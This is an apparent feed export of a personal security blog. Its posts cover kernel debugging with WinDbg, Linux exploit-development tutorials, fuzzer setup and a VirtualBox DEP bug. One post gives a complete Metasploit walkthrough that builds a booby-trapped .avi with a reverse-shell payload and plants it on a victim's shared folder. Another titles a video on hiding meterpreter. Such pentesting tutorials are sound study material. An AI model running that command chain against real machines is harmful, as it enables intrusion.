tag:blogger.com,1999:blog-69831435348242288922024-03-08T06:47:16.439-08:00ihazomgsecurityskillzJust another security related blog. sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.comBlogger25125tag:blogger.com,1999:blog-6983143534824228892.post-73316990852169789182012-09-24T06:14:00.000-07:002013-08-14T08:23:14.860-07:00Remote kernel debugging using Windbg.In the following article we will discuss two different methods of remote kernel debugging using Windbg and also various operating systems. Let's begin!<br />
<br />
NOTE: It is recommended that you use VMware for this I have NOT tested this on any other virtualisation software. <br />
<br />
<strong>1. VirtualKD:</strong> <br />
<br />
Giving the fact that this is a straight forward installation we will not be covering this in depth, you can find information and the download link on the official website at:- <br />
<br />
<a href="http://virtualkd.sysprogs.org/">http://virtualkd.sysprogs.org/</a><br />
<br />
Important notes: <br />
<br />
- This only works between a HOST and Virtual Machine it will NOT WORK between two virtual machines.<br />
- Very fast debugging compared to Serial Ports. <br />
- Only works on a Windows host so if you with to do this on OS X or Linux this will not help you. (There might be other similar software to help you achieve this however I am not aware of any)<br />
<br />
<strong>2. Serial Ports: </strong><br />
<br />
This method even though it's documented I found that most of the online sources I found were missing different steps or were covering an older version of VMware. For the following example we will use the following names: <br />
<br />
"DEBUGEE" - Machine to be debugged.<br />
"DEBUGGER" - Machine which runs the debugger.<br />
<br />
Make sure you have Windows Debugging tools installed on the debugger, if you do not you can download and install it at the following url:- <br />
<br />
<a href="http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx">http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx</a><br />
<br />
The next step is to edit the .vmx file of both debugger and debugee, before saving the changed make sure you have no serialport0 line before. <br />
<br />
<strong>WINDOWS:</strong> <br />
* DEBUGGER:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "\\.\pipe\D:\windbg"<br />serial1.pipe.endPoint = "client"</code><br />
* DEBUGEE:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "\\.\pipe\D:\windbg"</code><br />
Of course the fileName should be a valid path. <br />
<br />
<strong>OS X / LINUX: </strong><br />
* DEBUGGER:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "/private/tmp/windbg"<br />serial1.pipe.endPoint = "client"</code><br />
<br />
* DEBUGEE: <br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "/private/tmp/windbg"</code><br />
The same thing applies here, fileName should be a valid path.<br />
Now there is only one step left to do and that is to edit the c:\boot.ini on the debugee and add a line as follows: <br />
<br />
<code>multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows Server 2003 Debug" /fastdetect /NoExecute=OptIn /debug /debugport=com2 /baudrate=115200</code><br />
<br />
The above method only applies to Windows XP/2003 for further version you can use bcdedit.exe as follows: <br />
<br />
<code>bcdedit /debug on<br />bcdedit /enum (to see if debug mode is on)<br />bcedit /dbgsettings Serial debugport:<com_port> baudrate:115200 </code><br />
<br />
The last thing you need to do is open Windbg on your debugger and go to "File -> Kernel Debugging" (make sure you select com2 on port) and reboot your debugee machine.sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-49202397175251792011-05-15T02:05:00.000-07:002012-12-29T03:36:38.764-08:00Linux exploit development part 4 - ASCII armor bypass + return-to-pltI know it's been a lot of time since the last paper but this one gave me some headaches.<br/><br/>Download: <a href="http://www.exploit-db.com/download_pdf/17286">Linux exploit development part 4 - ASCII armor bypass + return-to-plt</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-22606696111298662172011-04-23T02:32:00.000-07:002012-12-29T03:36:38.753-08:00Linux exploit development part 3 (rev 2) - Real app demo ret2libcAs you have probably expected this is the real application demo + video demo of my part 3 of the Linux exploit development series.<br/><br/>Technical paper: <a href="http://www.exploit-db.com/download_pdf/17131">Linux exploit development part 3 - ret2libc</a><br/>Demo paper: <a href="http://www.exploit-db.com/download_pdf/17208">Linux exploit development part 3 (rev 2) - Real app demo ret2libc</a><br/>Video demo: <br/><br/><iframe src="http://player.vimeo.com/video/22760600?title=0&byline=0&portrait=0" width="400" height="255" frameborder="0"></iframe><p><a href="http://vimeo.com/22760600">Linux exploit development part 3 (rev 2) - Real app demo</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-89409639391983817472011-04-12T09:21:00.000-07:002012-12-29T03:36:38.784-08:00Linux Exploit Development Pt 2 (rev 2) - Real App Demo (part 2)Question:<br/>In short why another part 2 if we already have one?<br/><br/>Answer:<br/>Recently I've been receiving feedback from people who have read the papers and amongst those _sinn3r and corelanc0d3r actually recommended I should also give examples using real vulnerable application.<br/><br/>About the paper:<br/>I will not be repeating myself, this paper does not contain any theory in it. If you do not have the required knowledge I suggest you first read my part 2 paper before trying this: <a href="http://www.exploit-db.com/download_pdf/17049">Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg</a><br/><br/>The paper can be found <a href="http://www.exploit-db.com/download_pdf/17154">here</a> and long with the paper I've also made a quick video demonstration:<br/><br/><iframe src="http://player.vimeo.com/video/22242861" width="400" height="300" frameborder="0"></iframe><p><a href="http://vimeo.com/22242861">Linux exploit development part 2 (rev 2) - Demo</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br/><br/>Hope you enjoy it and have fun :)sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-66485667180974309412011-04-08T05:07:00.000-07:002012-12-29T03:36:38.771-08:00Linux exploit development part 3 - ret2libcI'm not going to repeat myself from the paper, this will just be a short description of what the paper contains.<br/><br/>So in the previous tutorials our exploits were made on Backtrack 4 R2 now we are going to make them on Debian Squeeze (latest) because Backtrack does not have DEP enabled by default (PAE enabled kernel on 32 bits).<br/><br/>In short terms DEP or NX prevents some stack or heap memory spaces from being executed, it also prevents executable memory from being writable. This is very effective against buffer overflows that inject and execute malicious code. (More about NX <a href="http://en.wikipedia.org/wiki/NX_bit">here</a>)<br/><br/>How to bypass this !? ... -> <a href="http://www.exploit-db.com/download_pdf/17131">Linux exploit development part 3 - ret2libc.pdf</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-36946860586232824202011-03-26T14:10:00.000-07:002012-12-29T03:36:38.759-08:00Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using
ret2regAs expected the part 2 of my tutorial series, I'm not going to repeat myself again, so without any other introductions here it is:<br/><br/><a href="http://www.exploit-db.com/download_pdf/17049">Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-65755266514390742222011-03-19T13:47:00.000-07:002012-12-29T03:36:38.770-08:00Linux exploit development part 1 - Stack overflow.I've started to write a series of tutorials about exploit development on Linux, this is the first part which contains a Stack overflow, with hardcoded ESP address (I know it's unreliable, that's why it's part 1).<br/>Anyways here is the PDF: <a href="http://www.exploit-db.com/download_pdf/17008">Linux exploit development part 1 - Stack overflow</a><br/><br/>Hope you enjoy it.sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com2tag:blogger.com,1999:blog-6983143534824228892.post-86028874960153715452011-03-12T16:38:00.000-08:002012-12-29T03:36:38.783-08:00Installing and Tweaking SPIKE and sickfuzz v0.3Not sure how many tried out this "fuzzer", but the v0.3 is out with more pwnsauce.<br/><br/>Download link: <a href="http://code.google.com/p/sickfuzz/downloads/list">http://code.google.com/p/sickfuzz/downloads/list</a><br/>svn checkout http://sickfuzz.googlecode.com/svn/trunk/ sickfuzz<br/><br/>New features:<br/>- Some SPIKE tweak.<br/>- Changed the SPIKE fuzzer.<br/>- Modified the .spk scripts.<br/>- More logs available.<br/>- More detailed help screen as well as output.<br/><br/>Fixed bugs:<br/>- Fixed tailing issue, now paths don't have to end with "/".<br/>- Now stops when app crashes without going over the other scripts.<br/><br/>Install SPIKE and sickfuzz:<br/><br/><code>root@bt:~# apt-get install automake<br/>root@bt:~# rm -rf /pentest/fuzzers/spike/<br/>root@bt:~# wget -P /tmp http://www.immunitysec.com/downloads/SPIKE2.9.tgz<br/>root@bt:~# tar xvzf /tmp/SPIKE2.9.tgz -C /pentest/fuzzers && rm /tmp/SPIKE2.9.tgz<br/>root@bt:~# cd /pentest/fuzzers/SPIKE/SPIKE/src/</code><br/><br/>Before actually starting to compile SPIKE we will make a little tweak (thank master @lupin for this one!).<br/>Open up spike.c, there are 2 lines that look like this:<br/><br/><code>printf("tried to send to a closed socket!\n");</code><br/><br/>Each of these 2 lines contains a "return 0;" instruction on the next line, we will replace this instruction with "exit(1);" save the file and proceed.<br/>(NOTE: ONLY REPLACE THOSE 2 INSTRUCTIONS NOT ALL!)<br/><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot1.png">snapshot_1</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot2.png">snapshot_2</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot3.png">snapshot_3</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot4.png">snapshot_4</a><br/><br/>Now we can proceed with SPIKE:<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-protector/g' Makefile<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make</code><br/><br/>If you get this error: <br/><br/><code>configure: creating ./config.status<br/> cd && /bin/sh ./config.status Makefile<br/>/bin/sh: ./config.status: No such file or directory<br/>make: *** [Makefile] Error 127</code><br/><br/>Execute the following commands again:<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-p$<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make</code><br/><br/>Should have worked now.<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# mv -f /pentest/fuzzers/SPIKE/SPIKE/src /pentest/fuzzers/spike/<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# cd<br/>root@bt:~# rm -rf /pentest/fuzzers/SPIKE/<br/><br/>root@bt:~# cd /pentest/fuzzers/<br/>root@bt:/pentest/fuzzers# svn checkout http://sickfuzz.googlecode.com/svn/trunk sickfuzz</code><br/><br/>Also if you are interested <a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a> made a nice script to automate the hole process:<br/><a href="http://code.google.com/p/sickfuzz/downloads/list">http://code.google.com/p/sickfuzz/downloads/list</a><br/><br/>For more info on using SPIKE check out lupin's guides: <br/><a href="http://resources.infosecinstitute.com/intro-to-fuzzing/">http://resources.infosecinstitute.com/intro-to-fuzzing/</a><br/><a href="http://resources.infosecinstitute.com/fuzzer-automation-with-spike/">http://resources.infosecinstitute.com/fuzzer-automation-with-spike/</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-16175599312746375762011-03-03T08:57:00.000-08:002012-12-29T03:36:38.751-08:00sickfuzz - HTTP fuzzer.Before we get started let's start with some basic knowledge which you might or might not know:<br/><br/><strong># What is fuzzing?</strong><br/><br/> So in short fuzzing is a technique used to discover coding errors in software, so it sends the specific port,app,etc. unexpected data. For example if we have a small application that asks us for a number between 1 and 10 and then divides our number to 2, what will happen if we enter "%Io&6...." ? (It's not the best example I know but I think you get the picture).<br/><br/><strong># How does this help us?</strong><br/><br/> Well depending on how the application crashes we can have a number of vulnerabilities like buffer overflows, DoS, etc ...<br/> NOTE: These definitions from above are not complete, if you want to get more details I suggest you try Google.<br/><br/>Before we begin some few answers to some questions that most of you will ask:<br/><br/><strong> 1. Why did I make a fuzzer, there are other fuzzers out there ?</strong><br/><br/> Yes you are right there are a lot of other fuzzers out there, my fuzzer wasn't intended to be a public fuzzer. I started making it for personal use and to learn more about fuzzing, but some friends told me I should give it a try and publish it, maybe people will like it.<br/><br/><strong> 2. Why is my fuzzer more special than other fuzzers out there ?</strong><br/><br/> The answer is simple, it's not! I didn't make it to be more special than other fuzzers out there, I just included some features that I needed and nothing more.<br/><br/>Ok now that we have covered these basic questions let's move on and see how it works and what features it has:<br/><br/><strong># What is sickfuzz?</strong><br/><br/> sickfuzz is a wrapper around <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE</a> written in python.<br/><br/><strong># How does it work?</strong><br/><br/> It actually accepts CLI arguments and based on those it launches the SPIKE "generic_send_tcp", with custom made .spk files.<br/><br/><strong># What other features does it have?</strong><br/><br/> - tshark (CLI version of wireshark support), once you start fuzzing tshark starts to capture http packets that go to your specified port for later analysis.<br/><br/> - checks to see if the app crashed or not, most apps usually if they receive a large number of requests, start denying them and most fuzzers see that as a crash and just stop, sickfuzz however when it encounters such a behaviour checks to see if the application did really crash or not, and if the application is still up it resumes the fuzzing process.<br/><br/> - It's really fast and has a lot of mutations (SPIKE rocks!)<br/><br/># What do I need to run it?<br/> - <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE</a><br/> - <a href="http://www.wireshark.org/">Wireshark (tshark + editcap)</a><br/> - <a href="http://www.python.org/getit/">Python</a><br/> - Web server victims<br/><br/>Also <a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a> made a cool video, demonstrating how to use it, check it out:<br/><br/><embed allowfullscreen="true" allowscriptaccess="always" height="500" src="http://blip.tv/play/hdkFgqflYwA%2Em4v" type="application/x-shockwave-flash" width="500"></embed><br/><br/>Download <a href="http://code.google.com/p/sickfuzz/downloads/list">sickfuzz</a><br/><br/>Ok not at the end I want to thank all who helped me with the fuzzer:<br/><a href="http://archangelamael.shell.tor.hu/">ArchangelAmael</a><br/><a href="http://www.nullthreat.net/">Nullthread</a><br/><a href="http://0entropy.blogspot.com/">Dinos</a><br/><a href="http://www.corelan.be/">corelanc0d3r</a><br/><a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a><br/><br/><a href="http://g0tmi1k.blogspot.com/">g0tmi1k's</a> blog post <a href="http://g0tmi1k.blogspot.com/2011/03/video-sickfuzz-v02.html">here</a>.sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-71689397881233607312011-02-06T10:29:00.000-08:002012-12-29T03:36:38.773-08:00Exploit writing made easy with !pvefindaddr.This is a quick paper I wrote containing a tutorial on how to use <a href="http://redmine.corelan.be:8800/projects/pvefindaddr">!pvefindaddr</a> made by <a href="https://twitter.corelanc0d3r">corelanc0d3r</a>, it does not cover the creating of an exploit only how this tool helps you in writing an exploit.<br/><br/>Download link: <a href="http://sickness.tor.hu/wp-content/uploads/2011/02/Exploit_writing_made_easy_with_pvefindaddr.pdf">Exploit_writing_made_easy_with_pvefindaddr.pdf</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-8426397528970999112011-01-30T08:40:00.000-08:002012-12-29T03:36:38.780-08:00ROP retn+offset and impact on stack setup.Ok so in short, I was playing with ROP chained exploits, in particular I was making an exploit for <a href="http://mini-stream.net/wm-downloader/">WM Downloader</a>.<br/><br/>I finally finished it and then asked <a href="https://twitter.com/#!/corelanc0d3r">corelanc0d3r</a> from the <a href="http://www.corelan.be:8800/">Corelan team</a> to test it. The exploits was good, but there were some ROP gadgets that differed so we tried to replace them and this came up: http://www.exploit-db.com/exploits/16072/<br/><br/>Everything seems ok ... but something was weird, as you can see we have a ROP gadget containing:<br/><code># INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4</code><br/><br/>I had some issues with padding RETN 4, so I asked <a href="https://twitter.com/#!/corelanc0d3r">corelanc0d3r</a> for a general padding rule, and then we realized that no one actually has one. ( Or not one that we know about. ) So we started documenting it and finally this came up: <a href="http://www.corelan.be:8800/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/">Corelan Site</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-73822052903220971712011-01-07T13:52:00.000-08:002012-12-29T03:36:38.777-08:00VBox DEP issue.First of all here is a quick demo about the issue: <br/><iframe src="http://player.vimeo.com/video/18547102" width="400" height="300" frameborder="0"></iframe><p><a href="http://vimeo.com/18547102">DEP Issue on VBox</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br/><br/>Ok now that you have seen the demo:<br/><br/>A lot of people Enable DEP on VirtualBox but did anyone test it to see if it works properly ? Well guess what it doesn't !<br/><br/>*How ?<br/> Well I wanted to test some DEP bypass methods, and I just have this habit before actually trying to bypass DEP, I turn it off and test that app with a simple exploit (usually to launch calc.exe) but I forgot to turn DEP off, it remained on and when I launched the exploit I did not receive a DEP error and the calculator got executed, you can take a look at the quick video demo to check it out.<br/><br/>*What I did.<br/> I started trying different things to make it work like upgrading to the latest VBox, made sure that my CPU supported NX, Enable PAE/NX from Vbox, reinstall the guest OS with PAE/NX enabled from the beginning, and others. Everything seemed ok but DEP was not working, I tried using tools like NXTEST which actually told me that DEP wasn't enabled so I tried the same configuration on Vmware and what do you know … it worked!<br/> After saying that Vmware DEP works I asked a few people to help me confirm this Vbox issue. From the feedback of these tests I learned that only 32 bit CPU's are affected by this, DEP works on 64.<br/> <br/>*Reason for this issue.<br/> So after saying this issue I have reported it to the guys at Vbox who after a while told me that they have figured out what is causing the problem, it's normal but they have not documented it yet. (Great, because DEP not working is not such a big deal, what could happen !?)<br/> QUOTE: <br/> “For raw mode we do NOT enable NX protection by default. I'm currently not<br/> aware of the exact reason but I believe this is to keep the code simpler<br/> or there are some compatibility issues.”<br/> (Yet this is not documented)<br/> <br/>*Fix.<br/> In order to fix this you need the following:<br/> -NX and PAE support ( cat /proc/cpuinfo and check the flags for nx pae )<br/> -A PAE enabled kernel ( which doesn't make much sense to me, Vmware DEP works without a PAE enabled kernel and NX and PAE are 2 different things from my point of view, but I might be wrong. )<br/> -You also need to invoke a command from the terminal to enable NX because apparently the option “Enable PAE/NX” from Vbox doesn't work ( not sure why they included it in the first place)<br/><br/> Ok so in order to fix DEP in Vbox, your CPU must support NX and PAE, you must run a PAE enabled kernel and:<br/> Open a terminal with the same privileges as your Virtual machines and type in:<br/><br/> "VBoxManage list vms"<br/> <br/> You will get something like this: "Windows" {xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx} <br/> Now issue the following command considering Windows as the name of your VM (Virtual Machines must be stopped ):<br/><br/> "VBoxManage setextradata “Windows” VBoxInternal/CPUM/EnableNX 1"<br/><br/> Now start the VM and DEP should work.<br/><br/> Author: sicknesssicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-63739133257399478382011-01-01T04:39:00.000-08:002012-12-29T03:36:38.767-08:00Blog status update.Due to recent events I do not have enough time to keep my blog updated very frequently, I will maintain it for the people who seek information from it and will post as soon as I have time.sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-47360368843068593922010-11-18T06:12:00.000-08:002012-12-29T03:36:38.762-08:00Update_bt.py script.Well I recently started learning python and at first I just wanted to see if I could do a basic update script and this is what came up<br/><br/>Hope you like it also I would appreciate some suggestions about what else it should contain.<br/>It includes internet connectivity check,<br/>This script currently:<br/>* Upgrades/Cleans Backtrack<br/>* Exploits: Metasploit2,3, Exploit-db, SET, FastTrack<br/>* Vulnerability Scanners: OpenVAS, Nikto, W3AF, Nessus (if you have it)<br/>* Wireless: Aircrack, Airodump, Kismet, Gerix<br/><br/>All of the following sections are included into different menus.<br/><br/><img alt="" src="http://img502.imageshack.us/img502/5025/91649502.png" title="bt_up.1" class="alignnone" width="590" height="450" /><br/><br/><br/><img alt="" src="http://img404.imageshack.us/img404/6885/25093397.png" title="bt_up.2" class="alignnone" width="590" height="450" /><br/><br/>EDIT: Well I have taken in consideration the suggestions I received via PM so I rewrote the script and included categories and more tools, here you go: <br/><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/02/bt_up.v.0.2.tar.gz">bt_up.tar.gz</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-23434801739846688472010-10-04T05:30:00.000-07:002012-12-29T03:36:38.755-08:00Nessus bridge for Metasploit.<embed src="http://blip.tv/play/AYKBnwkA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-71952428899502497002010-09-21T11:25:00.000-07:002012-12-29T03:36:38.774-08:00Hiding meterpreter using Iexpress.<embed src="http://blip.tv/play/AYH%2BrwAA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-89501882749832234262010-09-19T03:30:00.000-07:002012-12-29T03:36:38.786-08:00Backtrack vs Windows.<object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/WijVqtORa0Y?fs=1&hl=en_US"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/WijVqtORa0Y?fs=1&hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-83730790022094623682010-09-08T03:18:00.000-07:002012-12-29T03:36:38.778-08:00Running as root !?Ok so a lot of you people like using Backtrack and now that it's debian based and it is possible to use it as a daily OS things have changed a bit.<br/><br/> Now as you know there are a few guides on how to make an unprivileged user in Backtrack. <br/><a href="http://www.backtrack-linux.org/forums/backtrack-howtos/1741-howto-create-unprivileged-non-root-user-backtrack.html">Unprivileged user in BT</a><br/> Normally it's good to make an unprivileged users but I must remind you that Backtrack is not a normal OS, most of it's applications must be run as root, it was basically made to run as root and nothing else.<br/> If you ask people if it's ok to run as root, you will get an answer similar to this one: "It's not safe to run as root!", but did anyone tell you why ? or when is it safe to run as root ?<br/><br/>I'm going to try to clarify the risks and all that stuff regarding "Running as root".<br/>Keep in mind that what I am saying here applies to normal desktop PC's or laptops, not servers ....<br/><br/>Ok so let's begin:<br/><br/>Running as root has a bright side as well as a dark side:<br/><br/> ***BRIGHT SIDE*** <br/><br/> As you know the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions like: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it thinks you know what you are doing ... so if you don't log out now!<br/>This is a good thing because it does not bother you to type sudo for everything which gets annoying after a while.<br/><br/> ***DARK SIDE***<br/><br/> Now a lot of people are afraid to run as root, because they might break something ... and this is true, if you run as root and have no clue about what you are doing you might end up with 3 reinstalls per day. <br/>Running as root is not for everyone, you need some advanced skills in using the bash + some advanced knowledge about *nix. Oh and if you can't play in the bash without typing "rm -rf /*" every 20 seconds then close this window and stop reading for your own safety.<br/><br/> So base line. If you are not sure you can handle it and don't want to accidentally lose your important data or stuff don't run as root.<br/><br/> Another thing in running as root, people often say that you should not run as root for security reasons, this is also true. If an attacker gets hold of your system he will be root and he could do anything with your PC, but now I ask you ... how many services do you need running 24/7 on your home PC/laptop ?<br/><br/> Sure there are other ways of getting access to your system, like if you are in a LAN with others, they could try a MITM and maybe sniff your credentials but there are programs to protect you from this kind of attacks, you can even use ettercap for this or arpwatch, I'm sure if you google this things you will come up with something.<br/> Other methods would be to set an ev!l server with metasploit or SET and trick you in clicking it or send an email with some malicious .pdf or I don't know, now if you know you would click every link people give you and read every attachment on your email without scanning it ... close the windows NOW!<br/><br/>Now this are some of the security risks that you need to be aware of when running as root.<br/>Oh and one last thing don't think that if you're not running as root you are completely bullet proof !sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-56567893536324198522010-09-04T01:14:00.000-07:002012-12-29T03:36:38.765-08:00Sickness - Owning a windows xp with metasploit.<embed src="http://blip.tv/play/AYH6mFgA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed><br/><br/>Ok so first of all I did not do any video editing, so don't complain about it !<br/>Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.<br/>Third this is a basic video.<br/><br/>So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.<br/><br/>The tools used: fping, nmap, metasploit, inguma<br/><br/>Commands:<br/>Code:<br/><br/> fping -g 192.168.1.60 192.168.1.70<br/>nmap -sS -sV -f -n -O 192.168.1.66<br/>cd /pentest/exploits/framework3/<br/>./msfconsole<br/>cd /pentest/exploits/inguma<br/>./inguma.py<br/> autoscan<br/> 192.168.1.66<br/> y<br/> n<br/>cd /pentest/python/impacket-examples/<br/>./smbclient<br/> open 192.168.1.66<br/> login username password<br/> shares<br/>smbmount //192.168.1.66/Documents /media/<br/> cd /media/<br/> ls<br/><br/>Metasploit commands (making the infected .avi):<br/>Code:<br/><br/>search vlc<br/>use windows/fileformat/videolan_tivo<br/>set PAYLOAD windows/shell_reverse_tcp<br/>show options<br/>set FILENAME watch_me.avi<br/>set OUTPUTPATH /root/sickness/desktop/<br/>set LHOST 192.168.1.64<br/>exploit<br/><br/>Metasploit handler:<br/>Code:<br/><br/>use exploit/multi/handler<br/>set PAYLOAD windows/shell_reverse_tcp<br/>set LHOST 192.168.1.64<br/>exploit<br/><br/>Code:<br/><br/>cd /root/sickness/desktop<br/>mv -f watch_me.avi /media/Downloads<br/>smbumount /mediasicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-65355845408732116252010-09-01T02:58:00.000-07:002012-12-29T03:36:38.768-08:00Backtrack Products.Well it seems like my 3-4 month signature on the <a href="http://www.backtrack-linux.org/forums/">Backtrack forum</a> "I wans a Backtrack T-Shirt!" finally paid off.<br/>This morning <a href="http://archangelamael.blogspot.com/">archangelamael</a> just told me that I could buy one and a lot of more Backtrack accessories, but why not take a look yourself.<br/><br/><a href="http://www.trixgraphix.com/shop/category/backtrack-swag/">Backtrack Shop</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-27165279882312875142010-08-30T15:46:00.000-07:002012-12-29T03:36:38.756-08:0016 songs for evil hax0rz !!!Ok so rule number 1: "If you want to be an evil hax0r you have to listen to good music!" so here is a list of songs for hax0rz with youtube links:<br/><br/>1.<a href="http://www.youtube.com/watch?v=lezoOJb-yVw">Mushroomhead - Sun doesn't rise</a>(Searching google)<br/>2.<a href="http://www.youtube.com/watch?v=U45NfWSX-Vk">Mushroomhead - Solitaire Unraveling</a>(Nmap scan)<br/>3.<a href="http://www.youtube.com/watch?v=DB-3-TVjrxU">Infected Mushroom - Heavyweight</a>(Nessus & NeXpose)<br/>4.<a href="http://www.youtube.com/watch?v=tDE8q9YKC6Q">The Qemists - Stompbox (Spor Remix)</a>(Putting info together)<br/>5.<a href="http://www.youtube.com/watch?v=_Pyn87oJIlg">Mt Eden Dubstep - Prodigy : Omen</a>(Found a nice vulnerability)<br/>6.<a href="http://www.youtube.com/watch?v=lolM8GeGRQc">In Flames - My sweet shadow</a>(When you are bruteforcing)<br/>7.<a href="http://www.youtube.com/watch?v=jJP5MqniJZo&feature=related">In Flames - Cloud Connected</a>(Wireless cracking)<br/>8.<a href="http://www.youtube.com/watch?v=xX6UjWMffaY">Megadeth - Symphony of Destruction</a>(Buffer Overflow)MEGADETH RULZZZ<br/>9.<a href="http://www.youtube.com/watch?v=vMh-iXnkH18&ob=av2n">Megadeth - Trust</a>(Sniffing)THEY RULE AGAIN :X<br/>10. <a href="http://www.youtube.com/watch?v=8qRVNyot34o">Pantera - Walk</a>(Pivoting)<br/>11.<a href="http://www.youtube.com/watch?v=_10zZ1XpmU0">Children of Bodom - Angels Don't Kill</a>(Preparing for a social engineer 